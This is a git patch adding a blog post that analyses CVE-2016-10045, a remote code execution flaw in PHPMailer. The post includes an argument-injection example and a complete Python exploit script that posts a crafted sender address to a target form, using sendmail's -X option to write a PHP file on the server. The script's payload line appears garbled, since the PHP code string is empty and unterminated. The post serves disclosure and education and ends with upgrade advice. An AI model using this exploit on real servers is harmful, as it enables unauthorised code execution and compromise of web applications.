From a9847bb9379a3feb79a94fdcdd880d3c09857a81 Mon Sep 17 00:00:00 2001
From: priv <140729444+scriptprivate@users.noreply.github.com>
Date: Thu, 7 Nov 2024 08:36:34 -0300
Subject: [PATCH] feat(blog): add English version of CVE-2016-10045 post
---
_posts/2024-11-07-CVE-10045.markdown | 101 +++++++++++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 _posts/2024-11-07-CVE-10045.markdown
diff --git a/_posts/2024-11-07-CVE-10045.markdown b/_posts/2024-11-07-CVE-10045.markdown
new file mode 100644
index 000000000..0dce68840
--- /dev/null
+++ b/_posts/2024-11-07-CVE-10045.markdown
@@ -0,0 +1,101 @@
+---
+layout: post
+title: "Analysis of CVE-2016-10045: RCE in PHPMailer"
+date: 2024-11-07
+---
+
+[CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045)\[1\] is a critical vulnerability in [PHPMailer](https://github.com/PHPMailer/PHPMailer)\[2\], a widely used library for sending emails in [PHP](https://www.php.net/)\[3\] web applications, affecting versions prior to 5.2.18. This vulnerability allows attackers to execute malicious code on a compromised web server by exploiting an input validation flaw in the PHPMailer code.
+
+This publication is also available in: [Portuguese](https://blog.lesis.lat/blog/CVE-2016-10045/)
+
+---
+
+**Intro**
+
+PHPMailer remains one of the most widely used email-sending libraries, with approximately 9 million users worldwide. Additionally, it is also used in numerous open-source projects such as WordPress, Drupal, and Joomla.
+
+This vulnerability is particularly critical because, in most cases, the attacker does not need to be an authenticated user to inject malicious code and perform a [remote code execution (RCE)](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/)\[4\] on a web server.
+
+To exploit this vulnerability, an attacker simply needs to identify a form field that uses PHPMailer for email sending and submit the payload.
+
+---
+
+**Description**
+
+This vulnerability stems from an inadequate fix for [CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033)\[5\]. In PHPMailer version 5.2.17, the *$Sender* variable is sanitized using the *escapeshellarg()* function before being passed to the *mail()* function. However, an attacker can add an extra single quotation mark that isn’t properly escaped, breaking the intended flow of *escapeshellarg()*.
+
+Example:
+
+```php
+$mail \-\> SetFrom("\\"Attacker\\\\' \-Param2 \-Param3\\"@test.com", 'Client Name');
+```
+
+The above will result in the following list of arguments being passed to the email-sending application:
+
+```
+Arg no. 0 \== \[/usr/sbin/sendmail\]
+Arg no. 1 \== \[-t\]
+Arg no. 2 \== \[-i\]
+Arg no. 3 \== \[-f\\"Attacker\\\\\\\]
+Arg no. 4 \== \[-Param2\]
+Arg no. 5 \== \[-Param3"@test.com'\]
+```
+
+The attacker can pass the **\-X** parameter to create a log containing arbitrary PHP code, making versions prior to **5.2.20** vulnerable to remote code execution (RCE).
+
+---
+
+**Proof of Concept**
+
+Python script to exploit the vulnerability:
+
+```python
+#!/usr/bin/env python3
+import requests
+import argparse
+import re
+def exploit(url, dir):
+ if not re.match(r'^https?://', url):
+ url \= f"https://{url}"
+ payload \= "\\"attacker\\\\' \-oQ/tmp/ \-X%s/phpcode.php some\\"@email.com" % dir
+ code \= "\"
+
+ data \= {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': code}
+
+ response \= requests.post(url, data=data)
+
+ if response.status\_code \== 200:
+ print("Exploitation successful\!")
+ else:
+ print("Exploitation failed.")
+def main():
+ parser \= argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer')
+ parser.add\_argument('-t', '--target', required=True, help='Target URL')
+ parser.add\_argument('-d', '--dir', required=True, help='Remote recording directory')
+ args \= parser.parse\_args()
+
+ if args.target and args.dir:
+ exploit(args.target, args.dir)
+if \_\_name\_\_ \== '\_\_main\_\_':
+ main()
+```
+
+---
+
+**Conclusion**
+
+The vulnerability arises from a failure of improper input sanitization input in PHPMailer, allowing attackers to execute malicious code on compromised web servers. This poses a significant risk, as exploitation can be carried out without requiring authentication, allowing for remote code injection (RCE) in vulnerable applications.
+
+The potential impact of a successful exploitation includes the execution of arbitrary code, which potentially leads to security breaches and unauthorized access to sensitive information.
+
+The recommended mitigation is to update PHPMailer to version 5.2.20 or higher.
+
+---
+
+**References**
+
+* \[1\] [MITRE \- CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045)
+* \[2\] [GitHub \- PHPMailer: A full-featured email creation and transfer class for PHP](https://github.com/PHPMailer/PHPMailer)
+* \[3\] [PHP \- A popular general-purpose scripting language](https://www.php.net)
+* \[4\] [Cloudflare \- What is remote code execution?](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/)
+* \[5\] [MITRE \- CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033)